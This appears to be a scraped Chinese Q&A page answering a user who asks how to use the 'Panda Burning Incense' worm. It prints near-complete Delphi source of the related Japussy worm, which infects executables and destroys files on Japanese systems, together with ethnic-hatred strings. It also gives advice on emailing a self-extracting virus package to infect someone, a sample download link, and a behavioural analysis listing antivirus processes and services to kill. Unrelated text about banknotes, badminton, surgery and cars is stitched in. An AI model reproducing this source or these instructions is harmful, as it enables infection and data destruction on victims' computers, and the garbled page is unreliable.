熊猫烧香怎么使用啊

来源:360问答  责任编辑:小易  

“熊猫烧香”简介:“熊猫烧香”病毒是一个能在电脑操作系统上运行的蠕虫病毒。采用“熊猫烧香”头像作为图标。它的变种会感染EXE可执行文件,被病毒感染的文件图标均变为“熊猫烧香”。同时,受感染的计算机还会出现蓝屏、频繁重启以及文件被破坏等现象

本网有用户碰到这样的问题:熊猫烧香怎么使用啊,本网根据需求用户需求,为用户寻得以下其他网友提供的解决方法(内容来自百度知道、360问答、sogou问问、知乎等专业问答平台),方法仅供参考,不代表本网同意其观点,具体如下:

用户提供的解决方案1:

百度一下: 清除步骤 ========== 1. 断开网络 2. 结束病毒进程 %System%\FuckJacks.exe 3. 删除病毒文件: %System%\FuckJacks.exe 4. 右键点击分区盘符,点击右键菜单中的“打开”进入分区根目录,删除根目录下的文件: X:\autorun.inf X:\setup.

上网下熊猫烧香的病毒样本包,下载下来是压缩包,一解压就中毒,你自己千万别解压,把他改成自解压格式用邮件啥的发到电脑上,只要他下载,自动解压,他的电脑就中毒了,你这个是ese格式的,没有什么病毒会用这种格式,貌似是假货,一般病毒样本包都是压缩文件。

熊猫烧香是一款拥有自动传播、自动感染硬盘能力和强大的破坏能力的病毒。 “熊猫烧香”2006年11月就开始出现在互联网上。计算机反病毒专家称此病毒是计算机蠕虫病毒的一种变种,由于中毒电脑的可执行文件会变成一只可爱的熊猫,双手合十拿着三根香

用户提供的解决方案2:

“熊猫烧香” Panda burn incense 熊猫烧香又名武汉男生 名 它是蠕虫病毒经过多次变种产生的一种会感染所有exe格式文件的病毒;

你为什么要用这种有病毒的软件?

熊猫烧香的开发工具为Delphi 核心源码片段: program Japussy; uses Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry}; const HeaderSize = 82432; //病毒体的大小 IconOffset = $12EB8; //PE文件主图标的偏移量 其实是什么

用户提供的解决方案3:

藏品名称】1953年3元纸币人民币,别名苏三元【发行时间】1955年3月1日【停用时间】1964年5月15日【藏品面值】3元【字冠号码】三字冠、七号码【票面尺寸】160毫米X72.5毫米【印刷工艺】胶印四色、凹印二色【正面图案】井冈山龙源口图主深绿色【背面图案】花符国徽汉、蒙、维、藏四种文字行名和面值主深绿色【特征说明】(1)实心五角星花纹混合水印。(2)苏联代印,无特别暗记。触摸正背面字体花纹及图案,有强烈的凹凸感,较旧品则手感较差现如今市场上的全品苏三元几乎已经见不到,所以在购买苏三元时一定要谨慎。尽量不要在信息不全的网店买,即使在网店购买也一定要选择择正规的网络旗舰店。或实体店的官方网站

熊猫烧香原病毒样本下载地址:http://www.itmop.com/downinfo/140439.html

这次世锦赛林丹是非常渴望这个冠军的。这场决赛的失利,让林丹走下神坛,不再是那个赛场上闲庭信步、收放自如也能拿下对手的超级丹了。安克塞尔森从半决赛就展现出了非常好的状态。两局完爆谌龙,既有谌龙自己状态的问题,更多的是安克塞尔森的出色发挥。自己的身高优势把头顶杀球打造成了一个进攻利器,也是他对谌龙和林丹最多的得分手段。林丹虽然也一路胜利,但是他的胜利来的困难一点。林丹终结比赛能力的下降带来无谓的比赛时间的延长。这也为这位老将的体能带来了很大的消耗。决赛中的表现,林丹是想力拼第一局的。第一局如果拿下来,后面比赛的安排就自如很多。可惜追到20平之后,林丹两个挑球出界,葬送好局。第一局林丹对安克塞尔森的

一般来说点击那个熊猫图案的EXE就行了。

  剖腹产一般有横切和竖切之分,两者有些许差别,横切更为美观,竖切则开刀过程快,适合紧急情况下使用。横切伤口大概在趾骨上方3-4厘米处,长度大概在10-15厘米,竖切伤口在肚脐和趾骨之间的正中线,伤口长度大概在15厘米左右。一、伤口的分类  横切伤口  伤口高度约在耻骨联合上方3、4公分,伤口长度大约10-15公分。皮肤、皮下组织、筋膜都是横切,但是到了腹直肌则在中线处纵剖而进入腹腔内。  纵切伤口  伤口介于肚脐与耻骨联合之间的正中线,伤口长度大约15公分。  横切与竖切只是手术切口选择的问题。横切是以色列人开创的一手术方式,主要是利于术后早期拔尿管、切口因重力的作用压力较小利于康复等等。不

但不过注意:熊猫烧香的传播速度极快,可以通过网络传播,要试一下请在虚拟机里试!并且要事先安装杀毒软件,因为熊猫会感染一些网站,导致一些用户在访问网站时自动下载病毒包!因此请创建虚拟机的时候不要选择物理网络!不要在使用过程中插入U盘!试完后请删除虚拟机,因为熊猫备份了文件在C盘!

现在越来越多的消费者在选车购车的过程中,似乎更偏向于合资车型。消费者选择合资车的原因不外乎是技术成熟可靠、省心以及小毛病少等特点,对于自主品牌的车型相对而言选择的消费者就没那么多。殊不知其实现在有很多自主品牌车型都采用了合资车型的技术,今天就来盘点一些用了“合资芯”的自主品牌SUV。东风风神·AX7指导价:9.97-14.97万排量:1.4T2.0L2.3L油耗:7.6-9.5L/100km采用技术:老款CR-V底盘、PSA动力东风风神AX7在底盘技术上用了旧款本田CR-V的技术,在外观设计上中规中矩,前脸三条平行的镀铬装饰条颇显沉稳。车身侧面一条贯穿式腰线,看起来车辆动感不少。内饰设计上,风

请用XP系统进行测试!

用户提供的解决方案4:

这是什么时候的病毒了啊!

用户提供的解决方案5:

过时 多少年的东西了  想找到都难了。。而且 扔到现在 是个杀软 就能屏蔽了

扩展阅读,根据您访问的内容系统为您准备了以下内容,希望对您有帮助。

熊猫烧香怎么用?

上网下熊猫烧香的病毒样本包,下载下来是压缩包,一解压就中毒,你自己千万别解压,把他改成自解压格式用邮件啥的发到电脑上,只要他下载,自动解压,他的电脑就中毒了,你这个是ese格式的,没有什么病毒会用这种格式,貌似是假货,一般病毒样本包都是压缩文件。

希望回答对你有帮助。

熊猫烧香病毒怎么用?

小心把自己埋了

没编程和安全基础

就是把工具给你也不会用的

盗号不好

如果有兴趣就好好学把

“熊猫烧香”, 近日又化身为“金猪报喜” ,这是一个感染型的蠕虫病毒,它能感染系统中exe,com,pif,src,html,asp等文件,它还能中止大量的反病毒软件进程并且会删除扩展名为gho的文件,该文件是一系统备份工具GHOST的备份文件,使用户的系统备份文件丢失。被感染的用户系统中所有.exe可执行文件全部被改成可爱金猪的模样。

program Japussy;

uses

Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};

const

HeaderSize = 82432; //病毒体的大小

IconOffset = EB8; //PE文件主图标的偏移量

//在我的Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同

//查找2800000020的十六进制字符串可以找到主图标的偏移量

{

HeaderSize = 38912; //Upx压缩过病毒体的大小

IconOffset = BC; //Upx压缩过PE文件主图标的偏移量

//Upx 1.24W 用法: upx -9 --8086 Japussy.exe

}

IconSize = E8; //PE文件主图标的大小744字节

IconTail = IconOffset + IconSize; //PE文件主图标的尾部

ID = 444444; //感染标记

//无用码,以备写入

Catchword = 'If a race need to be killed out, it must be Yamato. ' +

'If a country need to be destroyed, it must be Japan! ' +

'*** W32.Japussy.Worm.A ***';

{$R *.RES}

function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer;

stDCall; external 'Kernel32.dll'; //函数声明

var

TmpFile: string;

Si: STARTUPINFO;

Pi: PROCESS_INFORMATION;

IsJap: Boolean = False; //日文版操作系统标记

{ 判断是否为windows 9.X版本 }

function IsWin9x: Boolean;

var

Ver: TOSVersionInfo;

begin

Result := False;

Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);

if not GetVersionEx(Ver) then

Exit;

if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x

Result := True;

end;

{ 在流之间复制 }

procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;

dStartPos: Integer; Count: Integer);

var

sCurPos, dCurPos: Integer;

begin

sCurPos := Src.Position;

dCurPos := Dst.Position;

Src.Seek(sStartPos, 0);

Dst.Seek(dStartPos, 0);

Dst.CopyFrom(Src, Count);

Src.Seek(sCurPos, 0);

Dst.Seek(dCurPos, 0);

end;

{ 将宿主文件从已感染的PE文件中分离出来,以备使用 }

procedure ExtractFile(FileName: string);

var

sStream, dStream: TFileStream;

begin

try

sStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);

try

dStream := TFileStream.Create(FileName, fmCreate);

try

sStream.Seek(HeaderSize, 0); //跳过头部的病毒部分

dStream.CopyFrom(sStream, sStream.Size - HeaderSize);

finally

dStream.Free;

end;

finally

sStream.Free;

end;

except

end;

end;

{ 填充STARTUPINFO结构 }

procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);

begin

Si.cb := SizeOf(Si);

Si.lpReserved := nil;

Si.lpDesktop := nil;

Si.lpTitle := nil;

Si.dwFlags := STARTF_USESHOWWINDOW;

Si.wShowWindow := State;

Si.cbReserved2 := 0;

Si.lpReserved2 := nil;

end;

{ 发带毒邮件 }

procedure SendMail;

begin

//邮件终止

end;

{ 感染PE文件 }

procedure InfectOneFile(FileName: string);

var

HdrStream, SrcStream: TFileStream;

IcoStream, DstStream: TMemoryStream;

iID: LongInt;

aIcon: TIcon;

Infected, IsPE: Boolean;

i: Integer;

Buf: array[0..1] of Char;

begin

try //出错则文件正在被使用,退出

if CompareText(FileName, 'JAPUSSY.EXE') = 0 then //是自己则不感染

Exit;

Infected := False;

IsPE := False;

SrcStream := TFileStream.Create(FileName, fmOpenRead);

try

for i := 0 to 8 do //检查PE文件头

begin

SrcStream.Seek(i, soFromBeginning);

SrcStream.Read(Buf, 2);

if (Buf[0] = #80) and (Buf[1] = #69) then //PE标记

begin

IsPE := True; //是PE文件

Break;

end;

end;

SrcStream.Seek(-4, soFromEnd); //检查感染标记

SrcStream.Read(iID, 4);

if (iID = ID) or (SrcStream.Size < 10240) then //小于10240的文件不被感染

Infected := True;

finally

SrcStream.Free;

end;

if Infected or (not IsPE) then //如果感染过了或不是PE文件则退出

Exit;

IcoStream := TMemoryStream.Create;

DstStream := TMemoryStream.Create;

try

aIcon := TIcon.Create;

try

//得到被感染文件的主图标(744字节),存入流

aIcon.ReleaseHandle;

aIcon.Handle := ExtractIcon(HInstance, PChar(FileName), 0);

aIcon.SaveToStream(IcoStream);

finally

aIcon.Free;

end;

SrcStream := TFileStream.Create(FileName, fmOpenRead);

//头文件

HdrStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);

try

//写入病毒体主图标之前的数据

CopyStream(HdrStream, 0, DstStream, 0, IconOffset);

//写入目前程序的主图标

CopyStream(IcoStream, 22, DstStream, IconOffset, IconSize);

//写入病毒体主图标到病毒体尾部之间的数据

CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize - IconTail);

//写入宿主程序

CopyStream(SrcStream, 0, DstStream, HeaderSize, SrcStream.Size);

//写入已感染的标记

DstStream.Seek(0, 2);

iID := 444444;

DstStream.Write(iID, 4);

finally

HdrStream.Free;

end;

finally

SrcStream.Free;

IcoStream.Free;

DstStream.SaveToFile(FileName); //替换宿主文件

DstStream.Free;

end;

except;

end;

end;

{ 将目标文件写入无用码后删除 }

procedure SmashFile(FileName: string);

var

FileHandle: Integer;

i, Size, Mass, Max, Len: Integer;

begin

try

SetFileAttributes(PChar(FileName), 0); //去掉只读属性

FileHandle := FileOpen(FileName, fmOpenWrite); //打开文件

try

Size := GetFileSize(FileHandle, nil); //获取文件大小

i := 0;

Randomize;

Max := Random(15); //写入无用码的随机次数

if Max < 5 then

Max := 5;

Mass := Size div Max; //每个间隔块的大小

Len := Length(Catchword);

while i < Max do

begin

FileSeek(FileHandle, i * Mass, 0); //定位

//写入无用码,将文件彻底破坏!

FileWrite(FileHandle, Catchword, Len);

Inc(i);

end;

finally

FileClose(FileHandle); //关闭文件

end;

DeleteFile(PChar(FileName)); //删除

except

end;

end;

{ 获得可以写入的驱动器列表 }

function GetDrives: string;

var

DiskType: Word;

D: Char;

Str: string;

i: Integer;

begin

for i := 0 to 25 do //遍历26个字母

begin

D := Chr(i + 65);

Str := D + ':\';

DiskType := GetDriveType(PChar(Str));

//得到本地磁盘和网络盘

if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then

Result := Result + D;

end;

end;

{ 遍历目录,感染和摧毁文件 }

procedure LoopFiles(Path, Mask: string);

var

i, Count: Integer;

Fn, Ext: string;

SubDir: TStrings;

SearchRec: TSearchRec;

Msg: TMsg;

function IsValidDir(SearchRec: TSearchRec): Integer;

begin

if (SearchRec.Attr <> 16) and (SearchRec.Name <> '.') and

(SearchRec.Name <> '..') then

Result := 0 //不是目录

else if (SearchRec.Attr = 16) and (SearchRec.Name <> '.') and

(SearchRec.Name <> '..') then

Result := 1 //不是根目录

else Result := 2; //是根目录

end;

begin

if (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) then

begin

repeat

PeekMessage(Msg, 0, 0, 0, PM_REMOVE); //调整消息队列,避免引起怀疑

if IsValidDir(SearchRec) = 0 then

begin

Fn := Path + SearchRec.Name;

Ext := UpperCase(ExtractFileExt(Fn));

if (Ext = '.EXE') or (Ext = '.SCR') then

begin

InfectOneFile(Fn); //感染可执行文件

end

else if (Ext = '.HTM') or (Ext = '.HTML') or (Ext = '.ASP') then

begin

//感染HTML和ASP文件,将Base64编码后的病毒写入

//感染浏览此网页的所有用户

//哪位大兄弟愿意完成之?

end

else if Ext = '.WAB' then //Outlook地址簿文件

begin

//获取Outlook邮件地址

end

else if Ext = '.ADC' then //Foxmail地址自动完成文件

begin

//获取Foxmail邮件地址

end

else if Ext = 'IND' then //Foxmail地址簿文件

begin

//获取Foxmail邮件地址

end

else

begin

if IsJap then //是倭文操作系统

begin

if (Ext = '.DOC') or (Ext = '.XLS') or (Ext = '.MDB') or

(Ext = '.MP3') or (Ext = '.RM') or (Ext = '.RA') or

(Ext = '.WMA') or (Ext = '.ZIP') or (Ext = '.RAR') or

(Ext = '.MPEG') or (Ext = '.ASF') or (Ext = '.JPG') or

(Ext = '.JPEG') or (Ext = '.GIF') or (Ext = '.SWF') or

(Ext = '.PDF') or (Ext = '.CHM') or (Ext = '.AVI') then

SmashFile(Fn); //摧毁文件

end;

end;

end;

//感染或删除一个文件后睡眠200毫秒,避免CPU占用率过高引起怀疑

Sleep(200);

until (FindNext(SearchRec) <> 0);

end;

FindClose(SearchRec);

SubDir := TStringList.Create;

if (FindFirst(Path + '*.*', faDirectory, SearchRec) = 0) then

begin

repeat

if IsValidDir(SearchRec) = 1 then

SubDir.Add(SearchRec.Name);

until (FindNext(SearchRec) <> 0);

end;

FindClose(SearchRec);

Count := SubDir.Count - 1;

for i := 0 to Count do

LoopFiles(Path + SubDir.Strings + '\', Mask);

FreeAndNil(SubDir);

end;

{ 遍历磁盘上所有的文件 }

procedure InfectFiles;

var

DriverList: string;

i, Len: Integer;

begin

if GetACP = 932 then //日文操作系统

IsJap := True; //去死吧!

DriverList := GetDrives; //得到可写的磁盘列表

Len := Length(DriverList);

while True do //死循环

begin

for i := Len downto 1 do //遍历每个磁盘驱动器

LoopFiles(DriverList + ':\', '*.*'); //感染之

SendMail; //发带毒邮件

Sleep(1000 * 60 * 5); //睡眠5分钟

end;

end;

{ 主程序开始 }

begin

if IsWin9x then //是Win9x

RegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程

else //WinNT

begin

//远程线程映射到Explorer进程

//

end;

//如果是原始病毒体自己

if CompareText(ExtractFileName(ParamStr(0)), 'Japussy.exe') = 0 then

InfectFiles //感染和发邮件

else //已寄生于宿主程序并开始工作

begin

TmpFile := ParamStr(0); //创建临时文件

Delete(TmpFile, Length(TmpFile) - 4, 4);

TmpFile := TmpFile + #32 + '.exe'; //真正的宿主文件,多一个空格

ExtractFile(TmpFile); //分离之

FillStartupInfo(Si, SW_SHOWDEFAULT);

CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,

0, nil, '.', Si, Pi); //创建新进程运行之

InfectFiles; //感染和发邮件

end;

end.

CMD命令 shutdown -a //取消计算机中病毒后的倒记时关机。

一个关于熊猫烧香的文档,如何使用

另存为.bat文件。如果你不怕其中的一些奇怪的命令

熊猫烧香的传播方法

金山分析:这是一个感染型的蠕虫病毒,它能感染系统中exe,com,pif,src,html,asp等文件,它还能结束大量的反病毒软件进程。

1、拷贝文件

病毒运行后,会把自己拷贝到

C:\WINDOWS\System32\Drivers\spoclsv.exe

2、添加注册表自启动

病毒会添加自启动项

svcshare ->C:\WINDOWS\System32\Drivers\spoclsv.exe

3、病毒行为

a:每隔1秒

寻找桌面窗口,并关闭窗口标题中含有以下字符的程序: QQKav QQAV 防火墙 进程 VirusScan 网镖 杀毒 毒霸 瑞星 江民 黄山IE 超级兔子 优化大师 木马克星 木马清道夫 QQ病毒 注册表编辑器 系统配置实用程序 卡巴斯基反病毒 Symantec AntiVirus Duba esteem proces 绿鹰PC 密码防盗 噬菌体 木马辅助查找器 System Safety Monitor Wrapped gift Killer Winsock Expert 游戏木马检测大师 msctls_statusbar32 pjf(ustc) IceSword 并使用的键盘映射的方法关闭安全软件IceSword

添加注册表使自己自启动 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run svcshare ->C:\WINDOWS\System32\Drivers\spoclsv.exe 并结束系统中以下的进程: Mcshield.exe VsTskMgr.exe naPrdMgr.exe UpdaterUI.exe TBMon.exe scan32.exe Ravmond.exe CCenter.exe RavTask.exe Rav.exe Ravmon.exe RavmonD.exe RavStub.exe KVXP.kxp kvMonXP.kxp KVCenter.kxp KVSrvXP.exe KRegEx.exe UIHost.exe TrojDie.kxp FrogAgent.exe Logo1_.exe Logo_1.exe Rundll32.exe b:每隔18秒

点击病毒作者指定的网页,

并用命令行检查系统中是否存在共享

共享存在的话就运行net share命令关闭admin$共享

c:每隔10秒

下载病毒作者指定的文件,

并用命令行检查系统中是否存在共享

共享存在的话就运行net share命令关闭admin$共享

d:每隔6秒

删除安全软件在注册表中的键值

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

RavTask

KvMonXP

kav

KAVPersonal50

McAfeeUpdaterUI

Network Associates Error Reporting Service

ShStartEXE

YLive.exe

yassistse

并修改以下值不显示隐藏文件

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL

CheckedValue -> 0x00

删除以下服务:

navapsvc

wscsvc

KPfwSvc

SNDSrvc

ccProxy

ccEvtMgr

ccSetMgr

SPBBCSvc

Symantec Core LC

NPFMntor

MskService

FireSvc

e:感染文件

病毒会感染扩展名为exe,pif,com,src的文件,把自己附加到文件的头部

并在扩展名为htm,html,asp,php,jsp,aspx的文件中添加一网址,

用户一但打开了该文件,IE就会不断的在后台点击写入的网址,达到

增加点击量的目的,但病毒不会感染以下文件夹名中的文件:

WINDOW

Winnt

System Volume Information

Recycled

Windows NT

WindowsUpdate

Windows Media Player

Outlook Express

Internet Explorer

NetMeeting

Common Files

ComPlus Applications

Messenger

InstallShield Installation Information

MSN

Microsoft Frontpage

Movie Maker

MSN Gamin Zone

g:删除文件

病毒会删除扩展名为gho的文件,该文件是一系统备份工具GHOST的备份文件;

使用户的系统备份文件丢失;

瑞星最新病毒分析报告:“Nimaya(熊猫烧香)”;

这是一个传染型的DownLoad,使用Delphi编写。


  • 本文相关:
  • 熊猫烧香怎么用?
  • 熊猫烧香病毒怎么用?
  • 一个关于熊猫烧香的文档,如何使用
  • 熊猫烧香的传播方法
  • 谁知道熊猫烧香怎么预防啊?
  • 熊猫烧香是怎么样进入电脑的
  • 熊猫烧香如何解决?
  • 什么是熊猫烧香啊?图片是什么?
  • “熊猫烧香”怎么用英文怎么说
  • 熊猫烧香是用什么编程语言写的?
  • 免责声明 - 关于我们 - 联系我们 - 广告联系 - 友情链接 - 帮助中心 - 频道导航
    Copyright © 2017 www.zgxue.com All Rights Reserved